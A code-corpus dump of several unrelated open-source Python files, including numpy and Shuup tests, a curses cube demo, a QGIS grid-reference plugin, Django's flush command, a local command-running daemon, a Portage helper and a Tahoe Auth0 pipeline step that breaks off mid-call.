assert_raises_fpe('invalid', np.spacing, float16(np.nan))
assert_raises_fpe('invalid', np.nextafter, float16(np.inf), float16(0))
assert_raises_fpe('invalid', np.nextafter, float16(-np.inf), float16(0))
assert_raises_fpe('invalid', np.nextafter, float16(0), float16(np.nan))
# These should not raise
float16(65472)+float16(32)
float16(2**-13)/float16(2)
float16(2**-14)/float16(2**10)
np.spacing(float16(-65504))
np.nextafter(float16(65504), float16(-np.inf))
np.nextafter(float16(-65504), float16(np.inf))
float16(2**-14)/float16(2**10)
float16(-2**-14)/float16(2**10)
float16(2**-14+2**-23)/float16(2)
float16(-2**-14-2**-23)/float16(2)
def test_half_array_interface(self):
"""Test that half is compatible with __array_interface__"""
class Dummy:
pass
a = np.ones((1,), dtype=float16)
b = Dummy()
b.__array_interface__ = a.__array_interface__
c = np.array(b)
assert_(c.dtype == float16)
assert_equal(a, c)
if __name__ == "__main__":
run_module_suite()
| Ziqi-Li/bknqgis | numpy/numpy/core/tests/test_half.py | Python | gpl-2.0 | 18,627 |
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import pytest
from decimal import Decimal
from django.test import override_settings
from django.test.client import RequestFactory
from shuup.campaigns.models import BasketCampaign, BasketLineEffect, CatalogCampaign
from shuup.campaigns.models.basket_conditions import CategoryProductsBasketCondition, ComparisonOperator
from shuup.campaigns.models.basket_line_effects import DiscountFromCategoryProducts, DiscountFromProduct
from shuup.campaigns.models.catalog_filters import ProductFilter
from shuup.campaigns.models.product_effects import ProductDiscountPercentage
from shuup.front.basket import get_basket
from shuup.testing.factories import create_product, get_default_category, get_default_supplier, get_shipping_method
from shuup_tests.campaigns import initialize_test
from shuup_tests.utils import printable_gibberish
@pytest.mark.django_db
@override_settings(SHUUP_DISCOUNT_MODULES=["customer_group_discount", "catalog_campaigns"])
def test_multiple_campaigns_cheapest_price():
rf = RequestFactory()
request, shop, group = initialize_test(rf, False)
price = shop.create_price
product_price = "100"
discount_percentage = "0.30"
discount_amount_value = "10"
total_discount_amount = "50"
expected_total = price(product_price) - (Decimal(discount_percentage) * price(product_price))
matching_expected_total = price(product_price) - price(total_discount_amount)
category = get_default_category()
supplier = get_default_supplier(shop)
product = create_product(printable_gibberish(), shop=shop, supplier=supplier, default_price=product_price)
shop_product = product.get_shop_instance(shop)
shop_product.categories.add(category)
# create catalog campaign
catalog_filter = ProductFilter.objects.create()
catalog_filter.products.add(product)
catalog_campaign = CatalogCampaign.objects.create(shop=shop, active=True, name="test")
catalog_campaign.filters.add(catalog_filter)
cdp = ProductDiscountPercentage.objects.create(campaign=catalog_campaign, discount_percentage=discount_percentage)
# create basket campaign
condition = CategoryProductsBasketCondition.objects.create(operator=ComparisonOperator.EQUALS, quantity=1)
condition.categories.add(category)
basket_campaign = BasketCampaign.objects.create(shop=shop, public_name="test", name="test", active=True)
basket_campaign.conditions.add(condition)
effect = DiscountFromProduct.objects.create(campaign=basket_campaign, discount_amount=discount_amount_value)
effect.products.add(product)
# add product to basket
basket = get_basket(request)
basket.add_product(supplier=supplier, shop=shop, product=product, quantity=1)
basket.shipping_method = get_shipping_method(shop=shop)
final_lines = basket.get_final_lines()
assert len(final_lines) == 2
assert basket.total_price == expected_total
effect.discount_amount = total_discount_amount
effect.save()
basket.uncache()
catalog_campaign.save() # save to bump caches
basket_campaign.save() # save to bump caches
assert basket.total_price == matching_expected_total # discount is now bigger than the original
effect.delete() # remove effect
basket.uncache()
catalog_campaign.save() # save to bump caches
basket_campaign.save() # save to bump caches
assert BasketLineEffect.objects.count() == 0
assert basket.total_price == expected_total
# add new effect
effect = DiscountFromCategoryProducts.objects.create(
category=category, campaign=basket_campaign, discount_amount=discount_amount_value
)
assert basket.total_price == expected_total
effect.discount_amount = total_discount_amount
effect.save()
basket.uncache()
catalog_campaign.save() # save to bump caches
basket_campaign.save() # save to bump caches
assert basket.total_price == matching_expected_total # discount is now bigger than the original
| shoopio/shoop | shuup_tests/campaigns/test_multiple_campaigns.py | Python | agpl-3.0 | 4,185 |
import sys
import os
sys.path.append(os.path.abspath(".."))
from termux2d import Canvas, line
import curses
import math
from time import sleep
import locale
locale.setlocale(locale.LC_ALL,"")
stdscr = curses.initscr()
stdscr.refresh()
class Point3D:
def __init__(self, x = 0, y = 0, z = 0):
self.x, self.y, self.z = float(x), float(y), float(z)
def rotateX(self, angle):
""" Rotates the point around the X axis by the given angle in degrees. """
rad = angle * math.pi / 180
cosa = math.cos(rad)
sina = math.sin(rad)
y = self.y * cosa - self.z * sina
z = self.y * sina + self.z * cosa
return Point3D(self.x, y, z)
def rotateY(self, angle):
""" Rotates the point around the Y axis by the given angle in degrees. """
rad = angle * math.pi / 180
cosa = math.cos(rad)
sina = math.sin(rad)
z = self.z * cosa - self.x * sina
x = self.z * sina + self.x * cosa
return Point3D(x, self.y, z)
def rotateZ(self, angle):
""" Rotates the point around the Z axis by the given angle in degrees. """
rad = angle * math.pi / 180
cosa = math.cos(rad)
sina = math.sin(rad)
x = self.x * cosa - self.y * sina
y = self.x * sina + self.y * cosa
return Point3D(x, y, self.z)
def project(self, win_width, win_height, fov, viewer_distance):
""" Transforms this 3D point to 2D using a perspective projection. """
factor = fov / (viewer_distance + self.z)
x = self.x * factor + win_width / 2
y = -self.y * factor + win_height / 2
return Point3D(x, y, 1)
vertices = [
Point3D(-20,20,-20),
Point3D(20,20,-20),
Point3D(20,-20,-20),
Point3D(-20,-20,-20),
Point3D(-20,20,20),
Point3D(20,20,20),
Point3D(20,-20,20),
Point3D(-20,-20,20)
]
# Define the vertices that compose each of the 6 faces. These numbers are
# indices to the vertices list defined above.
faces = [(0,1,2,3),(1,5,6,2),(5,4,7,6),(4,0,3,7),(0,4,5,1),(3,2,6,7)]
def __main__(stdscr, projection=False):
angleX, angleY, angleZ = 0, 0, 0
c = Canvas()
while 1:
# Will hold transformed vertices.
t = []
for v in vertices:
# Rotate the point around X axis, then around Y axis, and finally around Z axis.
p = v.rotateX(angleX).rotateY(angleY).rotateZ(angleZ)
if projection:
# Transform the point from 3D to 2D
p = p.project(50, 50, 50, 50)
#Put the point in the list of transformed vertices
t.append(p)
for f in faces:
for x,y in line(t[f[0]].x, t[f[0]].y, t[f[1]].x, t[f[1]].y):
c.set(x,y)
for x,y in line(t[f[1]].x, t[f[1]].y, t[f[2]].x, t[f[2]].y):
c.set(x,y)
for x,y in line(t[f[2]].x, t[f[2]].y, t[f[3]].x, t[f[3]].y):
c.set(x,y)
for x,y in line(t[f[3]].x, t[f[3]].y, t[f[0]].x, t[f[0]].y):
c.set(x,y)
f = c.frame(-40, -40, 80, 80)
stdscr.addstr(0, 0, '{0}\n'.format(f))
stdscr.refresh()
angleX += 2
angleY += 3
angleZ += 5
sleep(1.0/20)
c.clear()
if __name__ == '__main__':
from sys import argv
projection = False
if '-p' in argv:
projection = True
curses.wrapper(__main__, projection)
| ericmux/termux2d | examples/rotating_cube.py | Python | mit | 3,438 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
AddGridRef
A QGIS plugin
Adds British or Irish grid references to layers
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2019-01-30
copyright : (C) 2019 by Field Studies Council
email : r.burkmar@field-studies-council.org
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
__author__ = 'Field Studies Council'
__date__ = '2019-01-30'
__copyright__ = '(C) 2019 by Field Studies Council'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt5.QtCore import (QCoreApplication, QVariant)
from qgis.core import (QgsProcessing,
QgsMessageLog,
QgsFeatureSink,
QgsFeature,
QgsProcessingAlgorithm,
QgsField,
QgsCoordinateReferenceSystem,
QgsCoordinateTransform,
QgsProject,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterEnum,
QgsProcessingParameterString,
QgsProcessingParameterFeatureSink,
Qgis)
from . import osgr
class AddGridRefAlgorithm(QgsProcessingAlgorithm):
"""
This is an example algorithm that takes a vector layer and
creates a new identical one.
It is meant to be used as an example of how to create your own
algorithms and explain methods and variables used to do it. An
algorithm like this will be available in all elements, and there
is not need for additional work.
All Processing algorithms should extend the QgsProcessingAlgorithm
class.
"""
# Constants used to refer to parameters and outputs. They will be
# used when calling the algorithm from another algorithm, or when
# calling from the QGIS console.
OUTPUT = 'OUTPUT'
INPUT = 'INPUT'
GRTYPE = 'GRYPE'
PRECISIONS = 'PRECISIONS'
PREFIX = 'PREFIX'
dGrType = [
{"name": "British National Grid", "code": "os", "crs": QgsCoordinateReferenceSystem("EPSG:27700")},
{"name": "Irish National Grid", "code": "irish", "crs": QgsCoordinateReferenceSystem("EPSG:29903")}
]
aGrTypeName = list(map((lambda x: x["name"]), dGrType))
dPrecisions = [
{"text": "10 figure GR (1 m)", "num": 1, "field": "10figGR"},
{"text": "8 figure GR (10 m)", "num": 10, "field": "8figGR"},
{"text": "6 figure GR (100 m)", "num": 100, "field": "6figGR"},
{"text": "Monad (1 km)", "num": 1000, "field": "monad"},
{"text": "Tetrad (2 km)", "num": 2000, "field": "tetrad"},
{"text": "Quadrant (5 km)", "num": 5000, "field": "quadrant"},
{"text": "Hectad (10 km)", "num": 10000, "field": "hectad"},
{"text": "100 km", "num": 100000, "field": "100km"},
{"text": "Easting/northings", "num": -1, "field": "Easting Northing"},
{"text": "Lat/lng (WGS84)", "num": -2, "field": "Lat Lng"}
]
aPrecisionText = list(map((lambda x: x["text"]), dPrecisions))
# Get a reference to an osgr object
osgr = osgr.osgr()
def logMessage(self, message):
QgsMessageLog.logMessage(message, "Add Grid Ref Algorithm")
def initAlgorithm(self, config):
"""
Here we define the inputs and output of the algorithm, along
with some other properties.
"""
# We add the input vector features source. It can have any kind of
# geometry.
self.addParameter(
QgsProcessingParameterFeatureSource(
self.INPUT,
self.tr('Input layer'),
[QgsProcessing.TypeVectorAnyGeometry]
)
)
# Parameter for selecting British or Irish Grid
self.addParameter(
QgsProcessingParameterEnum(
self.GRTYPE,
self.tr('Select British or Irish National Grid'),
self.aGrTypeName,
False # Single select
)
)
# Parameter for selecting grid reference precisions
# Note that the multi-select does not work in the Modeller - https://issues.qgis.org/issues/20406
self.addParameter(
QgsProcessingParameterEnum(
self.PRECISIONS,
self.tr('Select the type of Grid References to add'),
self.aPrecisionText,
True # Multi select
)
)
# Parameter for prefixing field name
self.addParameter(
QgsProcessingParameterString(
self.PREFIX,
self.tr('Optionally, indicate a short prefix for output column names'),
None, # No default value
False, # Not multi-line
True # Optional
)
)
# We add a feature sink in which to store our processed features (this
# usually takes the form of a newly created vector layer when the
# algorithm is run in QGIS).
self.addParameter(
QgsProcessingParameterFeatureSink(
self.OUTPUT,
self.tr('Output layer')
)
)
def processAlgorithm(self, parameters, context, feedback):
"""
Here is where the processing itself takes place.
"""
feedback.pushInfo("Starting processing algo")
# Retrieve the feature source.
source = self.parameterAsSource(parameters, self.INPUT, context)
fields = source.fields()
# Get the field prefix
prefix = self.parameterAsString (parameters, self.PREFIX, context)
prefix = prefix.replace(" ", "")
# Get the precision choices and make the appropriate output fields
precisions = self.parameterAsEnums (parameters, self.PRECISIONS, context)
for p in precisions:
if self.dPrecisions[p]["num"] > 0:
fieldName = prefix + self.dPrecisions[p]["field"]
fields.append(QgsField(fieldName, QVariant.String))
elif self.dPrecisions[p]["num"] < 0: #Easting/northing (-1) or Lat/lng (-2)
if self.dPrecisions[p]["num"] == -1:
dataType = QVariant.Int
else:
dataType = QVariant.Double
fieldName = self.dPrecisions[p]["field"].split(" ")
fieldNameX = prefix + fieldName[0]
fields.append( QgsField(fieldNameX, dataType))
fieldNameY = prefix + fieldName[1]
fields.append(QgsField(fieldNameY, dataType))
# Create the feature sink. The 'dest_id' variable is used
# to uniquely identify the feature sink, and must be included in the
# dictionary returned by the processAlgorithm function.
(sink, dest_id) = self.parameterAsSink(parameters, self.OUTPUT,
context, fields, source.wkbType(), source.sourceCrs())
# Get the other parameters
grtype = self.parameterAsEnum (parameters, self.GRTYPE, context)
transform = None
if self.dGrType[grtype]["crs"] != source.sourceCrs():
transform = QgsCoordinateTransform(source.sourceCrs(), self.dGrType[grtype]["crs"], QgsProject.instance())
transformWGS84 = QgsCoordinateTransform(self.dGrType[grtype]["crs"], QgsCoordinateReferenceSystem("EPSG:4326"), QgsProject.instance())
# Compute the number of steps to display within the progress bar and
# get features from source
total = 100.0 / source.featureCount() if source.featureCount() else 0
features = source.getFeatures()
for current, feature in enumerate(features):
# Stop the algorithm if cancel button has been clicked
if feedback.isCanceled():
break
# Add grid references in here
geom = feature.geometry()
if transform is not None:
geom.transform(transform)
pt = geom.centroid().asPoint()
# Add a feature in the sink
newFeature = QgsFeature()
newFeature.setGeometry(feature.geometry())
newFeature.setFields(fields)
# Copy current field values
for field in source.fields():
newFeature[field.name()] = feature.attribute(field.name())
# Generate new field values
for p in precisions:
if self.dPrecisions[p]["num"] > 0:
gr = self.osgr.grFromEN(pt.x(), pt.y(), self.dPrecisions[p]["num"], self.dGrType[grtype]["code"])
if gr == "na":
gr = ""
newFeature[prefix + self.dPrecisions[p]["field"]] = gr
elif self.dPrecisions[p]["num"] < 0: #Easting/northing (-1) or Lat/lng (-2)
fieldName = self.dPrecisions[p]["field"].split(" ")
if self.dPrecisions[p]["num"] == -1:
x = int(pt.x())
y = int(pt.y())
fieldNameX = prefix + fieldName[0]
fieldNameY = prefix + fieldName[1]
else:
wgs84Point = transformWGS84.transform(pt)
x = wgs84Point.x()
y = wgs84Point.y()
fieldNameX = prefix + fieldName[1]
fieldNameY = prefix + fieldName[0]
newFeature[fieldNameX] = x
newFeature[fieldNameY] = y
sink.addFeature(newFeature, QgsFeatureSink.FastInsert)
# Update the progress bar
feedback.setProgress(int(current * total))
# Return the results of the algorithm. In this case our only result is
# the feature sink which contains the processed features, but some
# algorithms may return multiple feature sinks, calculated numeric
# statistics, etc. These should all be included in the returned
# dictionary, with keys matching the feature corresponding parameter
# or output names.
return {self.OUTPUT: dest_id}
def name(self):
"""
Returns the algorithm name, used for identifying the algorithm. This
string should be fixed for the algorithm, and must not be localised.
The name should be unique within each provider. Names should contain
lowercase alphanumeric characters only and no spaces or other
formatting characters.
"""
return 'Add GRs to layers'
def displayName(self):
"""
Returns the translated algorithm name, which should be used for any
user-visible display of the algorithm name.
"""
return self.tr(self.name())
def group(self):
"""
Returns the name of the group this algorithm belongs to. This string
should be localised.
"""
return self.tr(self.groupId())
def groupId(self):
"""
Returns the unique ID of the group this algorithm belongs to. This
string should be fixed for the algorithm, and must not be localised.
The group id should be unique within each provider. Group id should
contain lowercase alphanumeric characters only and no spaces or other
formatting characters.
"""
#return 'Grid references'
return None
def tr(self, string):
return QCoreApplication.translate('Processing', string)
def createInstance(self):
return AddGridRefAlgorithm()
| burkmarr/QGIS-Biological-Recording-Tools | add_grid_ref_algorithm.py | Python | gpl-3.0 | 12,593 |
import sys
from optparse import make_option
from django.conf import settings
from django.db import connections, router, transaction, models, DEFAULT_DB_ALIAS
from django.core.management import call_command
from django.core.management.base import NoArgsCommand, CommandError
from django.core.management.color import no_style
from django.core.management.sql import sql_flush, emit_post_sync_signal
from django.utils.importlib import import_module
from django.utils.six.moves import input
from django.utils import six
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list + (
make_option('--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.'),
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to flush. '
'Defaults to the "default" database.'),
make_option('--no-initial-data', action='store_false', dest='load_initial_data', default=True,
help='Tells Django not to load any initial data after database synchronization.'),
)
help = ('Returns the database to the state it was in immediately after '
'syncdb was executed. This means that all data will be removed '
'from the database, any post-synchronization handlers will be '
're-executed, and the initial_data fixture will be re-installed.')
def handle_noargs(self, **options):
db = options.get('database')
connection = connections[db]
verbosity = int(options.get('verbosity'))
interactive = options.get('interactive')
# 'reset_sequences' is a stealth option
reset_sequences = options.get('reset_sequences', True)
self.style = no_style()
# Import the 'management' module within each installed app, to register
# dispatcher events.
for app_name in settings.INSTALLED_APPS:
try:
import_module('.management', app_name)
except ImportError:
pass
sql_list = sql_flush(self.style, connection, only_django=True, reset_sequences=reset_sequences)
if interactive:
confirm = input("""You have requested a flush of the database.
This will IRREVERSIBLY DESTROY all data currently in the %r database,
and return each table to the state it was in after syncdb.
Are you sure you want to do this?
Type 'yes' to continue, or 'no' to cancel: """ % connection.settings_dict['NAME'])
else:
confirm = 'yes'
if confirm == 'yes':
try:
with transaction.commit_on_success_unless_managed():
cursor = connection.cursor()
for sql in sql_list:
cursor.execute(sql)
except Exception as e:
new_msg = (
"Database %s couldn't be flushed. Possible reasons:\n"
" * The database isn't running or isn't configured correctly.\n"
" * At least one of the expected database tables doesn't exist.\n"
" * The SQL was invalid.\n"
"Hint: Look at the output of 'django-admin.py sqlflush'. That's the SQL this command wasn't able to run.\n"
"The full error: %s") % (connection.settings_dict['NAME'], e)
six.reraise(CommandError, CommandError(new_msg), sys.exc_info()[2])
# Emit the post sync signal. This allows individual
# applications to respond as if the database had been
# sync'd from scratch.
all_models = []
for app in models.get_apps():
all_models.extend([
m for m in models.get_models(app, include_auto_created=True)
if router.allow_syncdb(db, m)
])
emit_post_sync_signal(set(all_models), verbosity, interactive, db)
# Reinstall the initial_data fixture.
if options.get('load_initial_data'):
# Reinstall the initial_data fixture.
call_command('loaddata', 'initial_data', **options)
else:
self.stdout.write("Flush cancelled.\n")
| postrational/django | django/core/management/commands/flush.py | Python | bsd-3-clause | 4,312 |
#!/usr/bin/env python
# coding: utf-8
#
# Copyright (c) 2019-2021, chys <admin@CHYS.INFO>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of chys <admin@CHYS.INFO> nor the names of other
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import print_function
import os
import pprint
import pwd
import socket
import stat
import sys
import subprocess
import threading
import time
try:
import Queue as queue
except ImportError:
import queue
try:
import cPickle as pickle
except ImportError:
import pickle
try:
FileNotFoundError
except NameError:
FileNotFoundError = OSError
def get_socket_path():
path = '/tmp/daemon-run-{}'.format(pwd.getpwuid(os.getuid()).pw_name)
if sys.platform.startswith('linux'):
path = '\0' + path
return path
def colorize(*args, **kwargs):
color = kwargs.pop('color')
print('[{}] \033[{}m'.format(time.strftime('%Y-%m-%d %H:%M:%S'), color),
end='')
kwargs['end'] = '\033[0m' + kwargs.pop('end', '\n')
print(*args, **kwargs)
def info(*args, **kwargs):
colorize(*args, color='32', **kwargs)
def error(*args, **kwargs):
colorize(*args, color='31;1', **kwargs)
current_proc = None
def executor(q):
global current_proc
while True:
req = q.get()
if req is None:
break
info('Handling request: {}'.format(pprint.pformat(req)))
env = os.environ.copy()
new_env = req.get('environ')
new_env['PWD'] = req['pwd']
if new_env:
env.update(new_env)
try:
current_proc = subprocess.Popen(req['cmd'], cwd=req['pwd'], env=env)
ret = current_proc.wait()
except (KeyError, TypeError, ValueError, OSError) as e:
error('Failed to execute command {}: {}'.format(
pprint.pformat(req), str(e)))
else:
info('Done with request: {} ret code: {}'.format(
pprint.pformat(req), ret), end='\n'*5)
finally:
current_proc = None
def daemon_handle(q, conn):
try:
conn.settimeout(2)
req_s = conn.recv(16384, socket.MSG_WAITALL)
info('Received {} bytes'.format(len(req_s)))
try:
req = pickle.loads(req_s)
except (pickle.UnpicklingError, ValueError, TypeError) as e:
error(str(e))
conn.send(b'Failed to unpickle message')
return
conn.send(b'OK')
except socket.error as e:
error(str(e))
return
finally:
conn.close()
info('Parsed request: {}'.format(pprint.pformat(req)))
cmd = req.get('cmd', ())
if cmd and cmd[0] == '--kill':
proc = current_proc
if proc:
for i in range(20):
if proc.poll() is not None:
break
else:
proc.terminate()
info('Sent SIGTERM to current process')
time.sleep(0.1)
else:
proc.kill()
info('Sent SIGKILL to current process')
else:
error('No current process to kill')
else:
q.put(req)
def daemon():
path = get_socket_path()
if not path.startswith('\0'):
try:
os.unlink(path)
except FileNotFoundError:
pass
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(path)
s.listen(5)
info('Listing on Unix-domain socket', s.getsockname())
q = queue.Queue()
th = threading.Thread(target=executor, args=(q,))
th.start()
try:
while True:
conn, addr = s.accept()
info('Accepted new connection', addr)
daemon_handle(q, conn)
except KeyboardInterrupt:
import signal
sys.exit(128 + signal.SIGINT)
finally:
q.put(None)
th.join()
def get_cwd():
env = os.environ.get('PWD')
real = os.getcwd()
if not env:
return real
try:
st_env = os.stat(env)
except (IOError, OSError):
return real
try:
st_real = os.stat(real)
except (IOError, OSError):
return env
if stat.S_ISDIR(st_env.st_mode) and st_env == st_real:
return env
else:
return real
def select_environ():
env = {}
for key in ['PATH']:
if key in os.environ:
env[key] = os.environ[key]
return env
def usage():
print('{}: Starts a daemon'.format(sys.argv[0]))
print('{} [-C <WORKING_DIRECTORY>] CMD [ARGS...]'.format(sys.argv[0]))
def client():
if sys.argv[1] == '--help':
usage()
return
pwd = None
args = sys.argv[1:]
while args:
if args[0] == '-C' and len(args) >= 2:
pwd = os.path.realpath(args[1])
del args[:2]
else:
break
path = get_socket_path()
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(path)
msg = {
'pwd': pwd or get_cwd(),
'cmd': args,
'environ': select_environ(),
}
info(pprint.pformat(msg))
# Force version 2 so that Python 2 and 3 can be used interchagably
s.send(pickle.dumps(msg, 2))
s.shutdown(socket.SHUT_WR)
info('RECEIVED FROM DAEMON:', s.recv(4096))
def main():
if len(sys.argv) < 2:
daemon()
else:
client()
if __name__ == '__main__':
main()
| chys87/scripts | daemon-run.py | Python | bsd-3-clause | 6,814 |
# -*- coding: utf-8 -*-
"""The tg2 package"""
| fedora-infra/fedmsg_middleware | examples/tg2/tg2/__init__.py | Python | lgpl-2.1 | 46 |
# Copyright 2010-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import tempfile
from portage import os
from portage import shutil
from portage.const import EBUILD_PHASES
from portage.elog import elog_process
from portage.package.ebuild.config import config
from portage.package.ebuild.doebuild import doebuild_environment
from portage.package.ebuild.prepare_build_dirs import prepare_build_dirs
from portage.util._async.SchedulerInterface import SchedulerInterface
from portage.util._eventloop.EventLoop import EventLoop
from _emerge.EbuildPhase import EbuildPhase
def spawn_nofetch(portdb, ebuild_path, settings=None):
"""
This spawns pkg_nofetch if appropriate. The settings parameter
is useful only if setcpv has already been called in order
to cache metadata. It will be cloned internally, in order to
prevent any changes from interfering with the calling code.
If settings is None then a suitable config instance will be
acquired from the given portdbapi instance. Do not use the
settings parameter unless setcpv has been called on the given
instance, since otherwise it's possible to trigger issues like
bug #408817 due to fragile assumptions involving the config
state inside doebuild_environment().
A private PORTAGE_BUILDDIR will be created and cleaned up, in
order to avoid any interference with any other processes.
If PORTAGE_TMPDIR is writable, that will be used, otherwise
the default directory for the tempfile module will be used.
We only call the pkg_nofetch phase if either RESTRICT=fetch
is set or the package has explicitly overridden the default
pkg_nofetch implementation. This allows specialized messages
to be displayed for problematic packages even though they do
not set RESTRICT=fetch (bug #336499).
This function does nothing if the PORTAGE_PARALLEL_FETCHONLY
variable is set in the config instance.
"""
if settings is None:
settings = config(clone=portdb.settings)
else:
settings = config(clone=settings)
if 'PORTAGE_PARALLEL_FETCHONLY' in settings:
return
# We must create our private PORTAGE_TMPDIR before calling
# doebuild_environment(), since lots of variables such
# as PORTAGE_BUILDDIR refer to paths inside PORTAGE_TMPDIR.
portage_tmpdir = settings.get('PORTAGE_TMPDIR')
if not portage_tmpdir or not os.access(portage_tmpdir, os.W_OK):
portage_tmpdir = None
private_tmpdir = tempfile.mkdtemp(dir=portage_tmpdir)
settings['PORTAGE_TMPDIR'] = private_tmpdir
settings.backup_changes('PORTAGE_TMPDIR')
# private temp dir was just created, so it's not locked yet
settings.pop('PORTAGE_BUILDIR_LOCKED', None)
try:
doebuild_environment(ebuild_path, 'nofetch',
settings=settings, db=portdb)
restrict = settings['PORTAGE_RESTRICT'].split()
defined_phases = settings['DEFINED_PHASES'].split()
if not defined_phases:
# When DEFINED_PHASES is undefined, assume all
# phases are defined.
defined_phases = EBUILD_PHASES
if 'fetch' not in restrict and \
'nofetch' not in defined_phases:
return
prepare_build_dirs(settings=settings)
ebuild_phase = EbuildPhase(background=False,
phase='nofetch',
scheduler=SchedulerInterface(EventLoop(main=False)),
settings=settings)
ebuild_phase.start()
ebuild_phase.wait()
elog_process(settings.mycpv, settings)
finally:
shutil.rmtree(private_tmpdir)
| clickbeetle/portage-cb | pym/portage/package/ebuild/_spawn_nofetch.py | Python | gpl-2.0 | 3,357 |
#!/usr/bin/env python
r"""Script for computing the error due to a non-well-balanced method"""
import os
import numpy
import clawpack.pyclaw.solution as solution
# Parameters
sea_level = 0.0
def compute_error(q, aux, eta, rho, norm=1):
r"""Compute the steady state error where eta are the surfaces"""
num_cells = q.shape[1]
# Create h from eta for true solution, assumes top layer is not dry
h_true = numpy.empty((2,num_cells))
hu_true = numpy.zeros((2,num_cells))
eta_true = numpy.zeros((2,num_cells))
h_compare = numpy.zeros((2,num_cells))
h_compare[0,:] = numpy.ones(num_cells) * eta[1] - aux[0,:]
h_true[1,:] = numpy.max(h_compare, axis=0)
eta_true[0,:] = numpy.zeros(num_cells)
eta_true[1,:] = h_true[1,:] + aux[0,:]
h_true[0,:] = (numpy.ones(num_cells) * eta[0] - (h_true[1,:] + aux[0,:])) * rho[0]
h_true[1,:] = h_true[1,:] * rho[1]
h = []
hu = []
eta_comp = []
h.append(q[0,...])
h.append(q[2,...])
hu.append(q[1,...])
hu.append(q[3,...])
eta_comp.append(h[0] / rho[0] + h[1] / rho[1] + aux[0,...])
eta_comp.append(h[1] / rho[1] + aux[0,...])
layers = 2
error = numpy.empty(3*layers)
for i in xrange(layers):
error[3*i] = numpy.linalg.norm(h[i] - h_true[i,:], ord=norm)
error[3*i+1] = numpy.linalg.norm(hu[i] - hu_true[i,:], ord=norm)
error[3*i+2] = numpy.linalg.norm(eta_comp[i] - eta_true[i,:], ord=norm)
return error
def sig_fig_round(x, figs=1):
for (i,value) in enumerate(x):
if value != 0.0:
x[i] = numpy.round(value, -int(numpy.floor(numpy.log10(value))) + (figs - 1))
# Truncate digits
raw_string = r"%." + str(figs) + "g"
x = [float(raw_string % value) for value in x]
return x
if __name__ == '__main__':
# Construct path to solutions
data_path = os.environ["DATA_PATH"]
eigen_method = 2
rho = [0.98, 1.0]
for test in ['smooth','jump']:
for dry in [True, False]:
sol_path = os.path.join(data_path,"well_balancing_%s" % test,
"ml_e%s_d%s_output" % (eigen_method, dry))
sol = solution.Solution(1, path=sol_path, read_aux=True)
if dry:
eta = [0.0, -6.0]
else:
eta = [0.0, -4.0]
print "%s, %s =" % (test, dry)
print " ",sig_fig_round(compute_error(sol.q, sol.aux, eta, rho, norm=1),figs=3)
print " ",sig_fig_round(compute_error(sol.q, sol.aux, eta, rho, norm=numpy.inf),figs=3) | mandli/multilayer-examples | 1d/well_balancing_comparison.py | Python | mit | 2,579 |
"""
Pipeline steps for Third Party Auth to support tahoe-auth0 package.
"""
import logging
import beeline
import tahoe_sites.api
from . import course_roles
TAHOE_AUTH0_BACKEND_NAME = 'tahoe-auth0'
log = logging.getLogger(__name__)
@beeline.traced(name='tpa_pipeline.set_roles_from_auth0_roles')
def set_roles_from_auth0_roles(auth_entry, strategy, details, user=None, *args, **kwargs):
"""
Update the user `is_admin` status and OrgStaffRole when using the `tahoe-auth0` backend.
This pipeline step links both `tahoe-auth0` and `tahoe-sites` packages.
Although unlikely, updates to either modules may break this step.
"""
backend_name = strategy.request.backend.name
beeline.add_context_field('backend_name', backend_name)
beeline.add_context_field('pipeline_details', details)
if user and backend_name == TAHOE_AUTH0_BACKEND_NAME:
set_as_admin = details['auth0_is_organization_admin']
set_as_organization_staff = details['auth0_is_organization_staff']
organization = tahoe_sites.api.get_current_organization(strategy.request)
organization_short_name = organization.short_name
beeline.add_context_field('organization_short_name', organization_short_name)
tahoe_sites.api.update_admin_role_in_organization(
user=user,
organization=organization,
